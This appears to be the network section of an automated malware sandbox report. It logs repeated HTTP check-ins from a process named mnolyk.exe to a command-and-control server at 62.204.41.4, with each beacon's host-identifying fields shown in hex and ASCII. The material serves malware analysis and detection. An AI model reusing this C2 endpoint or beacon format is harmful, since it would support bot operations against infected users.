                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    570 | 192.168.2.3 | 50273 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:34:03.177895069 CET | 769 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:34:03.244455099 CET | 770 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:34:03 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    571 | 192.168.2.3 | 50274 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:34:03.430516005 CET | 770 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:34:03.495460987 CET | 771 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:34:03 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    572 | 192.168.2.3 | 50275 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:34:03.675784111 CET | 771 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:34:03.739691019 CET | 772 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:34:03 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    573 | 192.168.2.3 | 50276 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:34:03.919337988 CET | 772 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:34:03.984200954 CET | 773 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:34:03 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    574 | 192.168.2.3 | 50277 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:34:04.178879976 CET | 773 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:34:04.245558023 CET | 774 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:34:04 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    575 | 192.168.2.3 | 50278 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:34:04.426126003 CET | 774 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:34:04.490910053 CET | 775 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:34:04 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    576 | 192.168.2.3 | 50279 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:34:04.664943933 CET | 775 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:34:04.729394913 CET | 776 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:34:04 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    577 | 192.168.2.3 | 50280 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:34:04.908554077 CET | 776 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:34:04.973890066 CET | 777 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:34:04 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    578 | 192.168.2.3 | 50281 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:34:05.145159960 CET | 777 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:34:05.212060928 CET | 778 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:34:05 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    579 | 192.168.2.3 | 50282 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:34:05.393872023 CET | 778 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:34:05.457537889 CET | 779 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:34:05 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    58 | 192.168.2.3 | 49760 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:31.042505026 CET | 259 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:31.108855009 CET | 259 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:31 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    59 | 192.168.2.3 | 49761 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:31.280569077 CET | 260 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:31.344552040 CET | 260 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:31 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    6 | 192.168.2.3 | 49707 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:10.935837030 CET | 206 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:11.000245094 CET | 207 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:10 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    60 | 192.168.2.3 | 49762 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:31.524264097 CET | 261 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:31.588319063 CET | 261 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:31 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    61 | 192.168.2.3 | 49763 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:31.780350924 CET | 262 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:31.843260050 CET | 262 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:31 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    62 | 192.168.2.3 | 49764 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:32.057321072 CET | 263 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:32.123912096 CET | 263 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:32 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    63 | 192.168.2.3 | 49765 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:32.555335999 CET | 264 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:32.620625019 CET | 264 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:32 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    64 | 192.168.2.3 | 49766 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:32.973144054 CET | 265 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:33.038276911 CET | 265 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:32 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    65 | 192.168.2.3 | 49767 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:33.408798933 CET | 266 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:33.474467039 CET | 266 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:33 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
